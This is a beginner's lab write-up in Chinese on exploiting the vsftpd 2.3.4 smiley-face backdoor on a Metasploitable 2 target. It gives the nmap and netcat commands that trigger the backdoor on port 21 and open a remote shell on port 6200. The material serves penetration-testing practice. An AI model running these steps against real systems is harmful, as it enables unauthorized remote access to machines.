远程控制:为什么6200端口变成了一个“后门”
测试工具:Netcat(瑞士军刀)
扫描工具:Nmap 7.94
查看靶机Metasploitable 2 ip
使用指令ifconfig
在kali中使用Namp对靶机端口进行扫描
使用指令nmap 192.168.85.132
可观察到21端口开放
kali中使用netcat连接靶机进行远程控制
使用指令nc ip port 连接即:nc 192.168.85.132 21
连接上后运用语法user 内容随意:)激活笑脸漏洞,pass 随意输入,即可打开靶机中的6200端口
使用nmap测试靶机6200端口开启情况
使用指令nmap -p port ip来查询:nmap -p 6200 192.168.85.132
可以观察到此时靶机的6200端口已经开启
kali中使用netcat通过6200端口连接靶机进行远程控制
使用指令 nc ip port实现 nc 192.168.85.132 6200
连接上后,即可通过一系列查询指令,拿到我们想要的东西,至此该渗透完成。
小结
1.通过本次实验让我对渗透的流程有了一个具象的了解,通过简单的漏洞复现让我感受到了渗透的魅力
2.虽然vsftpd-2.3.4已经是一个非常久远的漏洞了,也早已被修复,但用来给初学渗透的小白们用来做练习是个不错的选择